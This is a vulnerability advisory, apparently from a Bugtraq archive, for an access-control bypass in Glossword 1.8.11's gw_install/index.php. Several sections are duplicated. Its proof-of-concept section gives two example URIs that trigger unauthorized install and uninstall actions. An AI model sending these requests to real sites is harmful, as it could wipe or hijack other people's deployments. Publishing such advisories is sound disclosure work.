Glossword 'gw_install/index.php' Security Bypass Vulnerability
BID:35621
Info
Glossword 'gw_install/index.php' Security Bypass Vulnerability
| Bugtraq ID: | 35621 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 09 2009 12:00AM |
| Updated: | Jul 10 2009 05:16PM |
| Credit: | Evil-Cod3r |
| Vulnerable: |
Glossword Glossword 1.8.11 |
| Not Vulnerable: | |
Discussion
Glossword 'gw_install/index.php' Security Bypass Vulnerability
Glossword is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
Attackers can exploit this issue to bypass security restrictions to install and uninstall the application.
This issue affects Glossword 1.8.11; other versions may also be affected.
Glossword is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization.
Attackers can exploit this issue to bypass security restrictions to install and uninstall the application.
This issue affects Glossword 1.8.11; other versions may also be affected.
Exploit / POC
Glossword 'gw_install/index.php' Security Bypass Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
http://www.example.com/path/gw_install/index.php?arg[il]=english&arg[target]=install
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/path/gw_install/index.php?arg[il]=english&arg[target]=uninstall
http://www.example.com/path/gw_install/index.php?arg[il]=english&arg[target]=install
Solution / Fix
Glossword 'gw_install/index.php' Security Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Glossword 'gw_install/index.php' Security Bypass Vulnerability
References:
References:
- Glossword Sourceforge Page (Glossword)